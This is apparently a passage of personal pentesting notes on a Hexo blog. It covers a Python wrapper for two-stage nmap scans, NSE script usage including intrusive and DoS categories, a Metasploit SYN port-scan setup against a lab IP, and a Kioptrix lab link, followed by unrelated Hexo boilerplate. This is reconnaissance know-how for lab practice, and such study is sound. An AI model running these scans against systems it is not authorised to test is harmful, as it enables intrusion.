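    return ",".join(str(a) if a == b else "%d-%d" % (a, b) for a, b in ranges)


def two_stage(target: str) -> str:
    """Stage 1: every TCP port, grepable output on stdout. Stage 2: -A on
    the open ones only. -sS and -O (part of -A) need root; use -sT otherwise.
    target must be an IP address so it matches nmap's Host: line."""
    stage1 = subprocess.run(
        ["nmap", "-Pn", "-sS", "-T4", "-p-", "-oG", "-", target],
        capture_output=True, text=True, check=True).stdout
    ports = open_ports(stage1).get(target, [])
    if not ports:
        return "no open TCP ports on %s" % target
    return subprocess.run(
        ["nmap", "-Pn", "-sS", "-A", "-T4", "-p", port_arg(ports),
         "-oN", "tcpscan.txt", target],
        capture_output=True, text=True, check=True).stdout


if __name__ == "__main__":
    for host, ports in open_ports(SAMPLE_GNMAP).items():
        print(host, "->", port_arg(ports))   # 192.168.119.129 -> 22,80,139
```

The same parser works on a -sU sweep: UDP ports mostly come back as open|filtered, which is exactly why the state filter keeps them out of the expensive second stage until you have a reason to probe them individually.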

Nmap Scripting Engine (NSE)

Scripts are stored in /usr/share/nmap/scripts

nmap -vv -p 137 --script=all 192.168.119.129

--script=all runs every installed script, including the intrusive and dos categories, against the target. For a quieter run use --script=default (the same set -sC runs) or a wildcard such as --script "smb-*".

Scan with Metasploit

msfconsole
search portscan

## enter module:
use auxiliary/scanner/portscan/syn

show options
## change options, names are case insensitive
set RHOSTS 192.168.119.129
set PORTS 1-65535
set THREADS 10

## run it (exploit also works as an alias for auxiliary modules); the SYN scanner needs root for raw packets
run

Kioptrix: Level 1

Download: https://www.vulnhub.com/entry/kioptrix-level-1-1,22/

Walk Through

Kioptrix Level 1 Walkthrough

Hello World

Welcome to Hexo! This is your very first post. Check documentation for more info. If you get any problems when using Hexo, you can find the answer in troubleshooting or you can ask me on GitHub.

Quick Start

Create a new post

$ hexo new "My New Post"

More info: Writing

Run server

$ hexo server

More info: Server

Generate static files

$ hexo generate

More info: Generating

Deploy to remote sites

$ hexo deploy

More info: Deployment

Clone Notes:

Source Code Branch: source
Deploy Branch: Master

git clone -b source git@github.com:Gavincrz/gavincrz.github.io.git
cd gavincrz.github.io
npm install